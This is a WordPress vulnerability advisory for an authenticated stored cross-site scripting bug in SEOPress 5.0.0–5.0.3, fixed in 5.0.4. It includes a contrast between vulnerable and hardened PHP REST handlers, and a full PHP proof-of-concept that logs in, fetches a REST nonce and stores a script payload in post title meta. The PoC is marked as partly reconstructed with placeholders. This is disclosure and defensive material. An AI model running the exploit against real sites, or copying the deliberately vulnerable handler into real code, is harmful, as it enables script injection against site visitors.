Source: wpvulndb
Reporter: Chloe Chamberland
WPVDB-ID: B88613A6-7321-409F-BBA3-36450FB17724
Published: Aug 16, 2021 - 12:00 a.m.

SEOPress 5.0.0 – 5.0.3 - Authenticated Stored Cross-Site Scripting

Source: wpscan.com
Score: 5

EPSS: 0.001 (Low), percentile 21.9%

The plugin is vulnerable to stored cross-site scripting via the processPut function in ~/src/Actions/Api/TitleDescriptionMeta.php, which allows authenticated attackers to inject arbitrary web scripts. The affected code serves PUT requests to the plugin's REST route /wp-json/seopress/v1/posts/<id>/title-description-metas (the route used in the PoC below), so an attacker who holds a valid WordPress login cookie and a REST nonce can store the payload in the post's title/description meta, where it is later rendered into the page. Fixed in 5.0.4 (see the affected version range below).
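To make the bug class concrete, here is an added illustration (my own code, not SEOPress's and not the advisory's) of a WordPress REST handler that stores a title meta value: the vulnerable shape the advisory describes, followed by a hardened version. The route name demo/v1, the meta key _demo_title and all function names are hypothetical; only the WordPress core APIs (register_rest_route, sanitize_text_field, esc_attr, update_post_meta, current_user_can) are real.

```php
<?php
// Added illustration, not SEOPress code. Route, meta key and function
// names are hypothetical; the WordPress core functions are real.

// VULNERABLE shape: the caller-controlled title is stored verbatim and later
// printed into markup without escaping, so any authenticated user who can
// reach the route stores a script that runs for every visitor of the post.
function demo_process_put_vulnerable( WP_REST_Request $request ) {
    $post_id = (int) $request['id'];
    // No per-post capability check, no sanitization.
    update_post_meta( $post_id, '_demo_title', $request->get_param( 'title' ) );
    return rest_ensure_response( array( 'ok' => true ) );
}
function demo_render_title_vulnerable( $post_id ) {
    // Raw meta value inside an attribute: "><script>... breaks out.
    echo '<meta name="title" content="' . get_post_meta( $post_id, '_demo_title', true ) . '">';
}

// HARDENED shape: require edit rights on that post, strip tags on the way in,
// and escape for the attribute context on the way out. Output escaping is the
// control that actually stops XSS; input sanitization is defence in depth.
function demo_process_put_hardened( WP_REST_Request $request ) {
    $post_id = (int) $request['id'];
    if ( ! current_user_can( 'edit_post', $post_id ) ) {
        return new WP_Error( 'rest_forbidden', 'Insufficient permissions', array( 'status' => 403 ) );
    }
    $title = sanitize_text_field( (string) $request->get_param( 'title' ) );
    update_post_meta( $post_id, '_demo_title', $title );
    return rest_ensure_response( array( 'ok' => true, 'title' => $title ) );
}
function demo_render_title_hardened( $post_id ) {
    echo '<meta name="title" content="' . esc_attr( get_post_meta( $post_id, '_demo_title', true ) ) . '">';
}

// Register the hardened handler. permission_callback runs before the callback,
// and the args schema sanitizes the parameter before the handler even sees it.
add_action( 'rest_api_init', function () {
    register_rest_route( 'demo/v1', '/posts/(?P<id>\d+)/title', array(
        'methods'             => 'PUT',
        'callback'            => 'demo_process_put_hardened',
        'permission_callback' => function ( WP_REST_Request $request ) {
            return current_user_can( 'edit_post', (int) $request['id'] );
        },
        'args'                => array(
            'title' => array(
                'type'              => 'string',
                'sanitize_callback' => 'sanitize_text_field',
            ),
        ),
    ) );
} );
```

When reviewing a plugin for this pattern, check both sides: the REST route's permission_callback (is it `__return_true` or a bare is_user_logged_in?) and every place the stored meta is echoed. A sanitize_callback alone is not enough if the value is later rendered with a function like esc_html in an attribute context, or not escaped at all.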

PoC

The script below is the advisory's own PoC, repaired where extraction damaged it: the opening (the <?php tag, the target variables and the wp-login.php request up to its form fields) was cut off, the XSS payload that followed ?title= was stripped, and the quotes were converted to typographic ones. The reconstructed parts are marked as placeholders; the rest is unchanged apart from formatting.

<?php
// Placeholders: set these for your own test instance.
$wp_url    = 'http://target.example';
$wp_user   = 'testuser';
$wp_pass   = 'testpass';
$cookiejar = tempnam(sys_get_temp_dir(), 'wpcookie');

// Placeholder payload: the page's original payload was stripped during extraction.
$payload  = '<script>alert(document.domain)</script>';
$postdata = json_encode(['title' => $payload]);
$length   = strlen($postdata);

// Log in and keep the session cookies. Standard wp-login.php form fields; the
// 'log' key and the lines above it were missing from the extracted page.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'log'        => $wp_user,
    'pwd'        => $wp_pass,
    'rememberme' => 'forever',
    'wp-submit'  => 'Log+In',
]);
$output = curl_exec($ch);
curl_close($ch);

// Pull the REST API nonce
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php?action=rest-nonce');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

// REST API nonce (admin-ajax.php?action=rest-nonce returns the bare nonce string)
preg_match('/([^"]+)/', $content, $matches);
$restnonce = $matches[1];

// Store the payload in post 1's title meta through the SEOPress REST route
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-json/seopress/v1/posts/1/title-description-metas?title=' . urlencode($payload));
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'PUT');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Content-Type: application/json',
    "X-WP-Nonce: $restnonce",
    "Content-Length: $length",
]);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
$output = curl_exec($ch);
curl_close($ch);
print_r($output);
?>

Affected versions (CPE)

CPE Name      Operator   Version
wp-seopress   lt         5.0.4

